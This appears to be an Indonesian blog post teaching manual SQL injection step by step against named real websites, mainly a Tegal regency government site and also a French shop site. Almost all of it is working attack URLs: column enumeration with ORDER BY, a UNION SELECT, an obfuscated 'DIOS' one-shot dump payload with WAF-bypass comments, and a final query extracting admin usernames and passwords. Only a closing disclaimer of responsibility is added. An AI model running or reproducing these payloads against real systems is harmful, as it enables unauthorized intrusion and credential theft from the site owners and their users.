Cara dump website dengan SQL Injection manual ( step by step )

 SQL Injection adalah sebuah teknik yang menyalahgunakan sebuah celah keamanan yang terjadi dalam lapisan basis data sebuah aplikasi. Celah ini terjadi ketika masukan pengguna tidak disaring secara benar dari karakter-karakter pelolos bentukan string yang diimbuhkan dalam pernyataan SQL atau masukan pengguna tidak bertipe kuat dan karenanya dijalankan tidak sesuai harapan. Ini sebenarnya adalah sebuah contoh dari sebuah kategori celah keamanan yang lebih umum yang dapat terjadi setiap kali sebuah bahasa pemrograman atau skrip diimbuhkan di dalam bahasa yang lain

Cara pertama kita harus order dulu gunanya order adalah untuk melihat ada berapa kolom nomer

http://utama.tegalkab.go.id/artikel.php?id=113+ORDER+BY+100--+

 gakk ada ciri ciri erorr kita tambah titik (.) di depan (.113)

http://utama.tegalkab.go.id/artikel.php?id=.113+ORDER+BY+100--+

ADA ERROR kita coba kurangin angka nya jadi 5

http://www.covepro.fr/produit.php?id=28+order+by+13--+

mendekati atou  terlalu bawah kita coba naikan angka nya

 http://utama.tegalkab.go.id/artikel.php?id=.113+ORDER+BY+6--+    ERROR
 http://utama.tegalkab.go.id/artikel.php?id=.113+ORDER+BY+7--+    ERROR   http://utama.tegalkab.go.id/artikel.php?id=.113+ORDER+BY+8--+    NORAMAL


ternyata kolom nya sampai 8 kita UNION SELECT  ketik 1-8 seperti ini

http://utama.tegalkab.go.id/artikel.php?id=.113+UNION+SELECT+1,2,3,4,5,6,7,8--+

Ouhhhhhhhhh ternyata nomer togel nya tidak muncul

kita coba dengan tamabah kutip (') di balakang angka (133')

http://utama.tegalkab.go.id/artikel.php?id=.113'+UNION+SELECT+1,2,3,4,5,6,7,8--+

 akan ada muncul angka 2 berarti itu nomer TOGELNYA

 untuk  memastikan kita ketik (@@version) cara nya hapus angaka dua ganti dengan (@@version)

 http://utama.tegalkab.go.id/artikel.php?id=.113+UNION+SELECT+1,@@version,3,4,5,6,7,8--+

akan muncul VERSINYA : 5.5.57-0ubuntu0.14.04.1 
untuk melihat databes yang tadi di isi @@versison kita ganti dengan DIOS


INI DIOS NYA:::


concat/*!(unhex(hex(concat/*!(0x3c2f6469763e3c2f696d673e3c2f613e3c2f703e3c2f7469746c653e,0x223e,0x273e,0x3c62723e3c62723e,unhex(hex(concat/*!(0x3c63656e7465723e3c666f6e7420636f6c6f723d7265642073697a653d343e3c623e3a3a207e7472306a416e2a2044756d7020496e204f6e652053686f74205175657279203c666f6e7420636f6c6f723d626c75653e28574146204279706173736564203a2d20207620312e30293c2f666f6e743e203c2f666f6e743e3c2f63656e7465723e3c2f623e))),0x3c62723e3c62723e,0x3c666f6e7420636f6c6f723d626c75653e4d7953514c2056657273696f6e203a3a20,version(),0x7e20,@@version_comment,0x3c62723e5072696d617279204461746162617365203a3a20,@d:=database(),0x3c62723e44617461626173652055736572203a3a20,user(),(/*!12345selEcT*/(@x)/*!from*/(/*!12345selEcT*/(@x:=0x00),(@r:=0),(@running_number:=0),(@tbl:=0x00),(/*!12345selEcT*/(0)%20from(information_schema./**/columns)where(table_schema=database())%20and(0x00)in(@x:=Concat/*!(@x,%200x3c62723e,%20if(%20(@tbl!=table_name),%20Concat/*!(0x3c666f6e7420636f6c6f723d707572706c652073697a653d333e,0x3c62723e,0x3c666f6e7420636f6c6f723d626c61636b3e,LPAD(@r:=@r%2b1,%202,%200x30),0x2e203c2f666f6e743e,@tbl:=table_name,0x203c666f6e7420636f6c6f723d677265656e3e3a3a204461746162617365203a3a203c666f6e7420636f6c6f723d626c61636b3e28,database(),0x293c2f666f6e743e3c2f666f6e743e,0x3c2f666f6e743e,0x3c62723e),%200x00),0x3c666f6e7420636f6c6f723d626c61636b3e,LPAD(@running_number:=@running_number%2b1,3,0x30),0x2e20,0x3c2f666f6e743e,0x3c666f6e7420636f6c6f723d7265643e,column_name,0x3c2f666f6e743e))))x)))))*/


 DIOS GUNANYA UNTUK MELIHAT DATABES


   http://utama.tegalkab.go.id/artikel.php?id=.113+UNION+SELECT+1,concat/*!(unhex(hex(concat/*!(0x3c2f6469763e3c2f696d673e3c2f613e3c2f703e3c2f7469746c653e,0x223e,0x273e,0x3c62723e3c62723e,unhex(hex(concat/*!(0x3c63656e7465723e3c666f6e7420636f6c6f723d7265642073697a653d343e3c623e3a3a207e7472306a416e2a2044756d7020496e204f6e652053686f74205175657279203c666f6e7420636f6c6f723d626c75653e28574146204279706173736564203a2d20207620312e30293c2f666f6e743e203c2f666f6e743e3c2f63656e7465723e3c2f623e))),0x3c62723e3c62723e,0x3c666f6e7420636f6c6f723d626c75653e4d7953514c2056657273696f6e203a3a20,version(),0x7e20,@@version_comment,0x3c62723e5072696d617279204461746162617365203a3a20,@d:=database(),0x3c62723e44617461626173652055736572203a3a20,user(),(/*!12345selEcT*/(@x)/*!from*/(/*!12345selEcT*/(@x:=0x00),(@r:=0),(@running_number:=0),(@tbl:=0x00),(/*!12345selEcT*/(0)%20from(information_schema./**/columns)where(table_schema=database())%20and(0x00)in(@x:=Concat/*!(@x,%200x3c62723e,%20if(%20(@tbl!=table_name),%20Concat/*!(0x3c666f6e7420636f6c6f723d707572706c652073697a653d333e,0x3c62723e,0x3c666f6e7420636f6c6f723d626c61636b3e,LPAD(@r:=@r%2b1,%202,%200x30),0x2e203c2f666f6e743e,@tbl:=table_name,0x203c666f6e7420636f6c6f723d677265656e3e3a3a204461746162617365203a3a203c666f6e7420636f6c6f723d626c61636b3e28,database(),0x293c2f666f6e743e3c2f666f6e743e,0x3c2f666f6e743e,0x3c62723e),%200x00),0x3c666f6e7420636f6c6f723d626c61636b3e,LPAD(@running_number:=@running_number%2b1,3,0x30),0x2e20,0x3c2f666f6e743e,0x3c666f6e7420636f6c6f723d7265643e,column_name,0x3c2f666f6e743e))))x)))))*/,3,4,5,6,7,8--+

akan muncul DATABASE nya seperti ini




jika sudah kita DUMP gunanya dump untuk melihat isi USERNAME PASSWORD EMAIL dan isi DATABASEyanng lain nnya

caranya kita tulis yang kita pengen tau di web itu misal nya USERNAME dan PASSSWORD tapi harus ada di databes dan nama nya kita harus ngikutin yang ada di DATABASE  kalo gak gaakan mucul username dan password nya

lanjut ke prakteknya

http://utama.tegalkab.go.id/artikel.php?id=.113%27+union+select+1,group_concat(admin_username,0x3a,admin_password),3,4,5,6,7,8+from+admin--+


dan itulah USERNAME DAN PASSWORD nya
(,) koma adalah pemisah anatar USERNAME DAN PASSWORD




untuk (+from+admin--+) itu adalah komen mungkin itu bisa di sebut dengan
jenis DATABASE ADMIN




 sekian dan terimaksih mohon maaf dari segala kekurangan  dan

JIKA ADA KESALAH GUNAAN DALAM ILMU/TUTORIAL INI TIDAK SAYA BERTANGUNG JAWAB #GUNAKAN IILMU DENGAN BIJAK # 

Postingan terkait:

Belum ada tanggapan untuk "Cara dump website dengan SQL Injection manual ( step by step )"

Post a Comment